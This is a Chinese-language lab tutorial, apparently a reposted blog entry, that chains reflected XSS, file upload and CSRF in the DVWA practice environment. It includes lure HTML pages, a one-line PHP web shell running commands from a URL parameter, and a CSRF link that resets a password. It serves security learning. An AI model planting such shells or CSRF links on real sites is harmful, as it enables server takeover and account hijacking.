1. 程式人生 > >反射型XSS+文件上傳+CSRF—DVWA

反射型XSS+文件上傳+CSRF—DVWA

ott https item head 學習 change back 查看源碼 log

在學習的過程中,想到將幾種漏洞進行組合練習,記錄下學習過程。大佬請繞過!謝謝!!

測試環境:DVWA,安裝方法參考上一篇:https://www.cnblogs.com/aq-ry/p/9220584.html

前期知識:了解反射型XSS、文件上傳、CSRF漏洞原理及利用方法。

一、反射型XSS;

查看源碼文件:WWW\DVWA\vulnerabilities\xss_r\source\low.php

技術分享圖片

未做任何過濾,構造如下HTML代碼,分別為兩張圖片,誘惑用戶去點擊,形成XSS攻擊:

<!DOCTYPE html> <html> <head> <title>a標簽測試</title> <meta charset="utf-8"> </head> <body> 你想成為一名黑客嗎?<br> <a href="http://127.0.0.1/DVWA/vulnerabilities/upload/"> <img src="https://ss1.bdstatic.com/70cFvXSh_Q1YnxGkpoWK1HF6hhy/it/u=2067493440,1557616999&fm=27&gp=0.jpg" /> </a> </body> </html>

<!DOCTYPE html> <html> <head> <title>a標簽測試</title> <meta charset="utf-8"> </head> <body> 你想成為一名黑客嗎?<br> <a href="http://127.0.0.1/DVWA/vulnerabilities/csrf/"> <img src="https://timgsa.baidu.com/timg?image&quality=80&size=b9999_10000&sec=1530086683000&di=1b41000500ee5e5f73e792539819308f&imgtype=0&src=http%3A%2F%2Fe.hiphotos.baidu.com%2Fzhidao%2Fpic%2Fitem%2F738b4710b912c8fccfb476b1f4039245d6882102.jpg" /> </a> </body> </html>

技術分享圖片

第一張跳轉到文件上傳漏洞:

技術分享圖片

第二張跳轉到CSRF漏洞:

技術分享圖片

、文件上傳:

查看源碼:WWW\DVWA\vulnerabilities\upload\source\low.php

技術分享圖片

Phpinfo一句話:<?php phpinfo();?>

技術分享圖片

技術分享圖片

Shell.php一句話木馬:<?php echo shell_exec($_GET[‘cmd‘]);?>

技術分享圖片

技術分享圖片

技術分享圖片

或者上傳一句話木馬,用中國菜刀進行連接。

三、CSRF

查看源碼:WWW\DVWA\vulnerabilities\csrf\source\low.php

技術分享圖片

http://127.0.0.1/DVWA/vulnerabilities/csrf/?password_new=admin&password_conf=admin&Change=Change#

誘使用戶點擊此鏈接則修改了用戶的密碼:

技術分享圖片

若有錯誤之處,請各位大佬指出!本文屬於自己原創,轉載請註明出處,謝謝!

反射型XSS+文件上傳+CSRF—DVWA